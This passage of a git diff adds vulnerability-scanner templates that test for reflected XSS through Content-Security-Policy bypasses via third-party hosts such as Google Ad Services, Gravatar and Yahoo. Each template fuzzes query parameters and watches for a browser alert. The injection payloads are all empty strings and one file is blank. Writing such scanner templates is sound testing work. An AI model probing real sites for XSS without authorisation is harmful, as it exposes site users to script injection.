"{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: oamssoqae_ieee_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "oamssoqae_ieee_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml new file mode 100644 index 00000000000..000ad906817 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: olark-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Olark API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,olark + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: olark_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "olark_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml b/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml new file mode 100644 index 00000000000..8009fdea74b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml @@ -0,0 +1,55 @@ +id: openexchangerates-csp-xss + +info: + name: Content-Security-Policy Bypass via OpenExchangeRates + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,openexchangerates + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: openexchangerates_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "openexchangerates_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml b/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml new file mode 100644 index 00000000000..311b106b35f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml @@ -0,0 +1,55 @@ +id: page-gitlab-csp-xss + +info: + name: Content-Security-Policy Bypass via GitLab Page + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gitlab + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: page_gitlab_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "page_gitlab_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml b/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml new file mode 100644 index 00000000000..80d2ad8eaf0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml @@ -0,0 +1,55 @@ +id: partner-googleadservices-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Ad Services + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: partner_googleadservices_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "partner_googleadservices_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml new file mode 100644 index 00000000000..b60606ee3e8 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml @@ -0,0 +1,55 @@ +id: passport-baidu-csp-xss + +info: + name: Content-Security-Policy Bypass via Baidu Passport + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,baidu + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: passport_baidu_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "passport_baidu_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml new file mode 100644 index 00000000000..bf5462ed712 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: pinterest-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Pinterest API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,pinterest + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: pinterest_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "pinterest_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml new file mode 100644 index 00000000000..dedd42b0a36 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml @@ -0,0 +1,55 @@ +id: pixel-mathtag-csp-xss + +info: + name: Content-Security-Policy Bypass via Mathtag Pixel + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,mathtag + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: pixel_mathtag_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "pixel_mathtag_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml new file mode 100644 index 00000000000..00be5aedfa1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml @@ -0,0 +1,55 @@ +id: pixel-quantserve-csp-xss + +info: + name: Content-Security-Policy Bypass via Quantserve Pixel + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,quantserve + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: pixel_quantserve_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "pixel_quantserve_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml b/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml new file mode 100644 index 00000000000..0c692aaaf92 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml @@ -0,0 +1,55 @@ +id: portal-ayco-csp-xss + +info: + name: Content-Security-Policy Bypass via Ayco Portal + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ayco + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: portal_ayco_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "portal_ayco_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml new file mode 100644 index 00000000000..26b426bd4a0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml @@ -0,0 +1,55 @@ +id: pubads-doubleclick-csp-xss + +info: + name: Content-Security-Policy Bypass via DoubleClick PubAds + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,doubleclick + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: pubads_doubleclick_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "pubads_doubleclick_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml new file mode 100644 index 00000000000..c811b857770 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml @@ -0,0 +1,55 @@ +id: public-api-wordpress-csp-xss + +info: + name: Content-Security-Policy Bypass via WordPress Public API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,wordpress + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: public_api_wordpress_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "public_api_wordpress_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml b/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml new file mode 100644 index 00000000000..3bb93b99944 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml @@ -0,0 +1,55 @@ +id: qq-c-y-csp-xss + +info: + name: Content-Security-Policy Bypass via QQ C.Y + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,qq + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: qq_c_y_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "qq_c_y_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml new file mode 100644 index 00000000000..9210b67e546 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml @@ -0,0 +1,55 @@ +id: query-fqtag-csp-xss + +info: + name: Content-Security-Policy Bypass via FQTag Query + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,fqtag + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: query_fqtag_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "query_fqtag_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml b/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml new file mode 100644 index 00000000000..fd7ebad2dca --- /dev/null +++ b/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml @@ -0,0 +1,55 @@ +id: r-skimresources-csp-xss + +info: + name: Content-Security-Policy Bypass via SkimResources + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,skimresources + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: r_skimresources_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "r_skimresources_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml new file mode 100644 index 00000000000..fe8581f1de9 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss + +info: + name: Content-Security-Policy Bypass via IP-API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ip-api + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: raae2vza0snymz9cm3r8ix74bs71vdlz_edns_ip_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "raae2vza0snymz9cm3r8ix74bs71vdlz_edns_ip_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml b/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml new file mode 100644 index 00000000000..0519ecba6ea --- /dev/null +++ b/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml b/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml new file mode 100644 index 00000000000..0606cf67b78 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml @@ -0,0 +1,55 @@ +id: rentokil-domains-firebaseio-csp-xss + +info: + name: Content-Security-Policy Bypass via Firebase Rentokil Domains + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,firebase + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: rentokil_domains_firebaseio_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "rentokil_domains_firebaseio_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml b/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml new file mode 100644 index 00000000000..25ede2d8606 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml @@ -0,0 +1,55 @@ +id: reveal-clearbit-csp-xss + +info: + name: Content-Security-Policy Bypass via Clearbit Reveal + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,clearbit + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: reveal_clearbit_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "reveal_clearbit_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml new file mode 100644 index 00000000000..f6b4f605b0f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml @@ -0,0 +1,55 @@ +id: ring-csp-xss + +info: + name: Content-Security-Policy Bypass via Ring + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ring + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: ring_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "ring_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml new file mode 100644 index 00000000000..726cd34ef8e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml @@ -0,0 +1,55 @@ +id: romania-amazon-csp-xss + +info: + name: Content-Security-Policy Bypass via Amazon Romania + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,amazon + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: romania_amazon_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "romania_amazon_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml new file mode 100644 index 00000000000..40c30ccda79 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml @@ -0,0 +1,55 @@ +id: s-fqtag-csp-xss + +info: + name: Content-Security-Policy Bypass via FQTag S + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,fqtag + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: s_fqtag_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "s_fqtag_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml b/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml new file mode 100644 index 00000000000..b71a6aef785 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml @@ -0,0 +1,55 @@ +id: s-ytimg-csp-xss + +info: + name: Content-Security-Policy Bypass via YTImg S + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ytimg + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: s_ytimg_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "s_ytimg_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml new file mode 100644 index 00000000000..ea79c71aadc --- /dev/null +++ b/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml @@ -0,0 +1,55 @@ +id: search-yahoo-csp-xss + +info: + name: Content-Security-Policy Bypass via Yahoo Search + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yahoo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: search_yahoo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "search_yahoo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml new file mode 100644 index 00000000000..852f6816740 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml @@ -0,0 +1,55 @@ +id: secure-adnxs-csp-xss + +info: + name: Content-Security-Policy Bypass via Secure Adnxs + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,adnxs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: secure_adnxs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "secure_adnxs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml new file mode 100644 index 00000000000..471ca9e670f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml @@ -0,0 +1,55 @@ +id: secure-gravatar-csp-xss + +info: + name: Content-Security-Policy Bypass via Secure Gravatar + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gravatar + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: secure_gravatar_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "secure_gravatar_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml new file mode 100644 index 00000000000..dc5b9781ef5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml @@ -0,0 +1,55 @@ +id: secure-quantserve-csp-xss + +info: + name: Content-Security-Policy Bypass via Secure Quantserve + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,quantserve + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: secure_quantserve_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "secure_quantserve_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml b/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml new file mode 100644 index 00000000000..55cb72cfac3 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml @@ -0,0 